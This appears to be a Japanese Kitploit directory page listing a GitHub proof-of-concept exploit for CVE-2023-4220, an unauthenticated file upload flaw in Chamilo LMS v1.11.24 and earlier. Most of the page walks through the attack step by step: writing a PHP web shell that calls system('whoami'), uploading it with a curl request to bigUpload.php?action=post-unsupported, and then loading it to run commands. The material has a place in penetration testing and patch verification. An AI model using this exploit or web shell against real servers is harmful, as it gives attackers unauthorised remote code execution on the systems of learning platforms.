Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — CVE-2023-4220用の概念実証エクスプロイト:Chamilo LMSの未認証ファイルアップロード。ウェブシェル展開を介して保存型XSSとリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

CVE-2023-4220用の概念実証エクスプロイト:Chamilo LMSの未認証ファイルアップロード。ウェブシェル展開を介して保存型XSSとリモートコード実行を可能にします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見るウェブサイト
12年前未レビュー

Chamilo-LMS-Unauthenticated-File-Upload-

/main/inc/lib/javascript/bigupload/inc/bigUpload.php における大容量ファイルアップロード機能の制限なしファイルアップロードにより、Chamilo LMS <= v1.11.24 では、認証されていない攻撃者が保存型クロスサイトスクリプティング攻撃を実行し、Webシェルをアップロードしてリモートコード実行を取得できます。

影響を受けるバージョン ≤v1.11.24

CVE識別子 CVE-2023-4220

脆弱性の概要

/main/inc/lib/javascript/bigupload/inc/bigUpload.php による大容量ファイルアップロード機能により、Webルート内の /main/inc/lib/javascript/bigupload/files ディレクトリに任意のファイルをアップロードできます。

概念実証

  • /main/inc/lib/javascript/bigupload/files ディレクトリが存在する場合、以下のように任意のファイルをアップロードできます。

  • 悪意のあるphpファイルを作成する echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • その後、以下のコマンドを実行してこのファイルをアップロードできます。

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • ファイルがアップロードされたかは、/main/inc/lib/javascript/bigupload/files ディレクトリにアクセスして確認できます。 Untitled (1).png

  • そして、phpファイルをクリックして実行すると、whoamiコマンドの出力が得られます。 Untitled (1).png

ツールをダウンロード